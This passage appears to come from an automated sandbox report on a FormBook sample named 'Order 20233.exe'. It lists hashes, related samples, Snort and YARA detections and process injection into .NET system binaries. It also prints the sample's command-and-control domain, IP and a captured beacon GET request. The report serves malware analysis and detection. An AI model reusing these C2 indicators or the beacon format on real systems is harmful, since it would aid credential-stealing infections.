213.239.221.71	Scanned03.exe	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?7nUd=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL60635qkF7d3JYz4w==&h8O=fPd4B4LPHln4
	Scanned001.exe	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?DRfpF0=k6ATAhTPf&VbfX=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL60635qkF7d3JYz4w==
	nEry5lekj8.exe	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?nd9pMN=5jlH-6wPe8h&Kv=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL6PhGwxulrvx79L9bwQVhyaxyN+
	OUTSTANDING PI770100059 SOA OCT 2022.IMG	Get hash	malicious	Browse	www.ahmedo.ch/gkr4/?9rW=vntKkIEVBoNVN1MOoHZcEZLclaglVpSg+K3C0SFFc6ONyphiTzELja9EUQSYtn8vdiybK89MeWv+ZG+q3wQUffyeepY5h5/+rA==&pVvPi=jRwH
	OUTSTANDING PI770100059 SOA OCT 2022.IMG	Get hash	malicious	Browse	www.ahmedo.ch/gkr4/?yHtdQNIh=vntKkIEVBoNVN1MOoHZcEZLclaglVpSg+K3C0SFFc6ONyphiTzELja9EUQSYtn8vdiybK89MeWv+ZG+q3wQUffyeepY5h5/+rA==&4hI=J6tlnlN8Ijsd
	9umWLvLL9p.exe	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?-ZG=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL6PhA9rjz/U2akK8LwQVlSL8SN+&E4hd=0FQHghFXgx9xB
	7OCY3xDx8D.exe	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?oxl=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL606x8yuiPd0JQ74w==&SVhdfp=6ljLpfFPhZvD
	Transfer slip.xls	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?7n6tw=eBTDWrFHCR08yTr&r6Ah=C4IpA5iiNFvhwRpGHx78QVU2uVvJHDdcJi1XKvHDvYafZRhhpObl4ByFTs84q7sLfuSlj/f2PxlMkXEsyr/UhAU+qifmxZUe3f4SIFg=
	file.exe	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?Ev6lUhcH=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL606x8yuiPd0JQ74w==&n648Od=LN6tHj-pNJl
	file.exe	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?kHy=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL6Pvg811DPvnLkK4g==&oHm8=t2MTVb
	34FMLLwhq5.exe	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?z67XPNux=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL6Pvg811DPvnLkK4g==&3fL0=8pdDeJ5xD
	33hkxOuKtb.exe	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?2dx=a6ApuXL&-Zd=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL6PhGwxulrvx79L9bwQVhyaxyN+
	n5l2wqkldU.exe	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?ATd=9rnDHn70PrC0tLj0&9rWp=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL606x8yuiPd0JQ74w==
	72822ZE1Uq.exe	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?5jfx=HFNxiV-pIbBtUlN&p0GhlH=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL60635qkF7d3JYz4w==
	file.exe	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?_8Rx=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL606x8yuiPd0JQ74w==&GPS=7nahAPZhqL
	ref 00ED9940T009X11.xls	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?5jPhPf=2dJpdrkp&mBTtbF=C4IpA5iiNFvhwRpGHx78QVU2uVvJHDdcJi1XKvHDvYafZRhhpObl4ByFTs84q7sLfuSlj/f2PxlMkXEsyr/UhAU+qifmxZUe3f4SIFg=
	file.exe	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?Cl=lR-Td&ZRtX=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL60635qkF7d3JYz4w==
	dekont.xls	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?0d=wBH4LHWh-&z48xxF20=C4IpA5iiNFvhwRpGHx78QVU2uVvJHDdcJi1XKvHDvYafZRhhpObl4ByFTs84q7sLfuSlj/f2PxlMkXEsyr/UhAU+qifmxZUe3f4SIFg=
	file.exe	Get hash	malicious	Browse	www.ahmedo.ch/dcn0/?8pW=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL6Pvg811DPvnLkK4g==&d2MD=k6AD
	OUTSTANDING PI770100059 SOA OCT 2022.exe	Get hash	malicious	Browse	www.ahmedo.ch/gkr4/?vL30f8EH=vntKkIEVBoNVN1MOoHZcEZLclaglVpSg+K3C0SFFc6ONyphiTzELja9EUQSYtn8vdiybK89MeWv+ZG+q3wQUffyeepY5h5/+rA==&Phl4iL=HL08qvExNthXW

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.ahmedo.ch	Scanned03.exe	Get hash	malicious	Browse	213.239.221.71
	Scanned001.exe	Get hash	malicious	Browse	213.239.221.71
	nEry5lekj8.exe	Get hash	malicious	Browse	213.239.221.71
	OUTSTANDING PI770100059 SOA OCT 2022.IMG	Get hash	malicious	Browse	213.239.221.71
	OUTSTANDING PI770100059 SOA OCT 2022.IMG	Get hash	malicious	Browse	213.239.221.71
	9umWLvLL9p.exe	Get hash	malicious	Browse	213.239.221.71
	7OCY3xDx8D.exe	Get hash	malicious	Browse	213.239.221.71
	Transfer slip.xls	Get hash	malicious	Browse	213.239.221.71
	file.exe	Get hash	malicious	Browse	213.239.221.71
	file.exe	Get hash	malicious	Browse	213.239.221.71
	34FMLLwhq5.exe	Get hash	malicious	Browse	213.239.221.71
	33hkxOuKtb.exe	Get hash	malicious	Browse	213.239.221.71
	n5l2wqkldU.exe	Get hash	malicious	Browse	213.239.221.71
	72822ZE1Uq.exe	Get hash	malicious	Browse	213.239.221.71
	file.exe	Get hash	malicious	Browse	213.239.221.71
	ref 00ED9940T009X11.xls	Get hash	malicious	Browse	213.239.221.71
	file.exe	Get hash	malicious	Browse	213.239.221.71
	dekont.xls	Get hash	malicious	Browse	213.239.221.71
	Order details.xls	Get hash	malicious	Browse	213.239.221.71
	file.exe	Get hash	malicious	Browse	213.239.221.71

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	googleDriveDesktopAlbum14.exe	Get hash	malicious	Browse	195.201.57.90
	googleDriveDesktopAlbum14.exe	Get hash	malicious	Browse	195.201.57.90
	B07BE8360DD11E81F6830AE467BEC71CB6058523B3594.exe	Get hash	malicious	Browse	148.251.234.83
	prog.apk	Get hash	malicious	Browse	144.76.58.8
	SecuriteInfo.com.Variant.Tedy.268270.23439.11373.exe	Get hash	malicious	Browse	95.217.121.186
	2Xz12CWeJC.exe	Get hash	malicious	Browse	95.217.49.230
	file.exe	Get hash	malicious	Browse	144.76.136.153
	file.exe	Get hash	malicious	Browse	95.217.49.230
	Tom8W5Dz0O.exe	Get hash	malicious	Browse	144.76.136.153
	v5Nmd23c88.exe	Get hash	malicious	Browse	95.217.49.230
	yOxO1yU2vo.exe	Get hash	malicious	Browse	95.217.49.230
	DwTQhWb3i0.exe	Get hash	malicious	Browse	95.217.49.230
	LlrB6FmEy8.exe	Get hash	malicious	Browse	95.217.49.230
	9Jd5PcPt6c.exe	Get hash	malicious	Browse	95.217.49.230
	setup.exe	Get hash	malicious	Browse	94.130.190.48
	pi00m7oWQM.exe	Get hash	malicious	Browse	95.217.49.230
	9Et3wGuQP5.exe	Get hash	malicious	Browse	95.217.49.230
	k4wo22JbaL.exe	Get hash	malicious	Browse	95.217.49.230
	fdqsovzwsF.exe	Get hash	malicious	Browse	95.217.49.230
	uLQ18p6dLg.exe	Get hash	malicious	Browse	95.217.49.230

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Order 20233.exe.log

Download File

Process:	C:\Users\user\Desktop\Order 20233.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1510
Entropy (8bit):	5.381105762964764
Encrypted:	false
SSDEEP:	24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPN+84xpNT:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1f
MD5:	A3195731DF98BB6BDA4A3DE6D454C33C
SHA1:	CBEE1CB7EAFDE247618CC50DDE5D9A143732C7E4
SHA-256:	68DD8AFDE633D8CEF50498ADA0CAD19DEEAF370EB6A01D718D11A499D44E2CCA
SHA-512:	11DF23E67BBC8A6DA19406BB025FB0F90304B9FD7A2987FC7678E072AE288094A022E9BB8EDB06B102095BFB54BC8C703FD7D646925D6681F256B52354D04DFD
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Temp\4184-48M

Download File

Process:	C:\Windows\SysWOW64\mstsc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.565938948299627
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	Order 20233.exe
File size:	1827328
MD5:	cfc3542e983b4a7436dabb73132cbbdb
SHA1:	c792d80b3667badeef358a872cc5b548d9114151
SHA256:	614490e3bf7cf0672ecda890e33b49f4f8b80da18333111489284df04ab7d934
SHA512:	f434b55379dc227f8908b6e25c39a61e699a0b6f90b5d48128f148c6c838ead6d8ec330191d62c409236bc109a95b7fa6a5ad234c99ee57584dc2405490d38fb
SSDEEP:	24576:0G/gSI7uzvdh53ATay0Lu9fE124K2Gzo/Xyhp4HtNLpTGLRvO4x:dgruLMayJWao/XC6B
TLSH:	258532203AFE601DF1B3AF795FF4759AA97FFA623B02945D1051034A0A23E41DDD1A3A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....L.Y.........."...0.................. ....@...... ....................... ......5.....`................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x59EE4CED [Mon Oct 23 20:11:25 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1c0000	0x10	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1bfc02	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1bdc8e	0x1bde00	False	0.39824640366554526	data	4.567184281741237	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1c0000	0x10	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3213.239.221.7149698802031412 01/08/23-16:24:08.929621	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49698	80	192.168.2.3	213.239.221.71
192.168.2.3213.239.221.7149698802031449 01/08/23-16:24:08.929621	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49698	80	192.168.2.3	213.239.221.71
192.168.2.3213.239.221.7149698802031453 01/08/23-16:24:08.929621	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49698	80	192.168.2.3	213.239.221.71

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2023 16:24:08.907176018 CET	49698	80	192.168.2.3	213.239.221.71
Jan 8, 2023 16:24:08.929352045 CET	80	49698	213.239.221.71	192.168.2.3
Jan 8, 2023 16:24:08.929502010 CET	49698	80	192.168.2.3	213.239.221.71
Jan 8, 2023 16:24:08.929620981 CET	49698	80	192.168.2.3	213.239.221.71
Jan 8, 2023 16:24:08.952090025 CET	80	49698	213.239.221.71	192.168.2.3
Jan 8, 2023 16:24:08.957961082 CET	80	49698	213.239.221.71	192.168.2.3
Jan 8, 2023 16:24:08.958008051 CET	80	49698	213.239.221.71	192.168.2.3
Jan 8, 2023 16:24:08.958194971 CET	49698	80	192.168.2.3	213.239.221.71
Jan 8, 2023 16:24:08.958410025 CET	49698	80	192.168.2.3	213.239.221.71
Jan 8, 2023 16:24:08.980180025 CET	80	49698	213.239.221.71	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2023 16:24:08.849303961 CET	49977	53	192.168.2.3	8.8.8.8
Jan 8, 2023 16:24:08.895353079 CET	53	49977	8.8.8.8	192.168.2.3
Jan 8, 2023 16:24:18.985353947 CET	57840	53	192.168.2.3	8.8.8.8
Jan 8, 2023 16:24:19.005789042 CET	53	57840	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2023 16:24:08.849303961 CET	192.168.2.3	8.8.8.8	0x8412	Standard query (0)	www.ahmedo.ch	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:24:18.985353947 CET	192.168.2.3	8.8.8.8	0x2ac9	Standard query (0)	www.iamme-label.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2023 16:24:08.895353079 CET	8.8.8.8	192.168.2.3	0x8412	No error (0)	www.ahmedo.ch		213.239.221.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:24:19.005789042 CET	8.8.8.8	192.168.2.3	0x2ac9	No error (0)	www.iamme-label.com	iamme-label.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2023 16:24:19.005789042 CET	8.8.8.8	192.168.2.3	0x2ac9	No error (0)	iamme-label.com		81.169.145.80	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.ahmedo.ch

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49698	213.239.221.71	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:24:08.929620981 CET	154	OUT	GET /dcn0/?pFQ0Q=4h6DHJsXwPiPeVap&oRk4IZo0=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL606x8yuiPd0JQ74w== HTTP/1.1 Host: www.ahmedo.ch Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 8, 2023 16:24:08.957961082 CET	154	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 08 Jan 2023 15:24:08 GMT Content-Type: text/html; charset=utf-8 Content-Length: 254 Connection: close X-Varnish: 1006141483 Retry-After: 5 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 20 20 3c 68 33 3e 47 75 72 75 20 4d 65 64 69 74 61 74 69 6f 6e 3a 3c 2f 68 33 3e 0a 20 20 20 20 3c 70 3e 58 49 44 3a 20 31 30 30 36 31 34 31 34 38 33 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 3e 0a 20 20 20 20 3c 70 3e 56 61 72 6e 69 73 68 20 63 61 63 68 65 20 73 65 72 76 65 72 3c 2f 70 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <head> <title>404 Not Found</title> </head> <body> <h1>Error 404 Not Found</h1> <p>Not Found</p> <h3>Guru Meditation:</h3> <p>XID: 1006141483</p> <hr> <p>Varnish cache server</p> </body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Order 20233.exePID: 5872, Parent PID: 3452

General

Target ID:	0
Start time:	16:23:10
Start date:	08/01/2023
Path:	C:\Users\user\Desktop\Order 20233.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\Order 20233.exe
Imagebase:	0x21772580000
File size:	1827328 bytes
MD5 hash:	CFC3542E983B4A7436DABB73132CBBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: aspnet_compiler.exePID: 6120, Parent PID: 5872

General

Target ID:	4
Start time:	16:23:24
Start date:	08/01/2023
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Imagebase:	0x1eacc870000
File size:	54888 bytes
MD5 hash:	7809A19AA8DA1A41F36B60B0664C4E20
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: AddInProcess.exePID: 2140, Parent PID: 5872

General

Target ID:	6
Start time:	16:23:29
Start date:	08/01/2023
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
Imagebase:	0x1892c120000
File size:	42080 bytes
MD5 hash:	11D8A500C4C0FBAF20EBDB8CDF6EA452
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: Microsoft.Workflow.Compiler.exePID: 1360, Parent PID: 5872

General

Target ID:	7
Start time:	16:23:29
Start date:	08/01/2023
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Imagebase:	0x29ba2ba0000
File size:	32872 bytes
MD5 hash:	D91462AE31562E241AF5595BA5E1A3C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: dfsvc.exePID: 2288, Parent PID: 5872

General

Target ID:	8
Start time:	16:23:29
Start date:	08/01/2023
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Imagebase:	0x1be839a0000
File size:	24160 bytes
MD5 hash:	48FD4DD682051712E3E7757C525DED71
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: aspnet_wp.exePID: 2104, Parent PID: 5872

General

Target ID:	10
Start time:	16:23:30
Start date:	08/01/2023
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
Imagebase:	0x7ff651cf0000
File size:	50784 bytes
MD5 hash:	3F68BCF536EEAE067038C67022CDF6D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: aspnet_regsql.exePID: 5300, Parent PID: 5872

General

Target ID:	11
Start time:	16:23:30
Start date:	08/01/2023
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
Imagebase:	0x15782f30000
File size:	126560 bytes
MD5 hash:	F31014EE4DE7FE48E9B7C9BE94CFB45F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: aspnet_regiis.exePID: 1760, Parent PID: 5872

General

Target ID:	13
Start time:	16:23:30
Start date:	08/01/2023
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
Imagebase:	0x7ff66ccd0000
File size:	44640 bytes
MD5 hash:	061D8C0371566D560C5B15C77A34046F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mscorsvw.exePID: 3956, Parent PID: 5872

General

Target ID:	15
Start time:	16:23:31
Start date:	08/01/2023
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
Imagebase:	0x7ff7da510000
File size:	128584 bytes
MD5 hash:	B00E9325AC7356A3F4864EAAAD48E13F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: ngen.exePID: 5612, Parent PID: 5872

General

Target ID:	16
Start time:	16:23:31
Start date:	08/01/2023
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
Imagebase:	0x7ff63bfc0000
File size:	174184 bytes
MD5 hash:	FBA5E8D94C9EADC279BC06B9CF041A9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: AddInProcess32.exePID: 4392, Parent PID: 5872

General

Target ID:	17
Start time:	16:23:31
Start date:	08/01/2023
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
Imagebase:	0xe60000
File size:	42080 bytes
MD5 hash:	F2A47587431C466535F3C3D3427724BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3452, Parent PID: 4392

General

Target ID:	20
Start time:	16:23:35
Start date:	08/01/2023
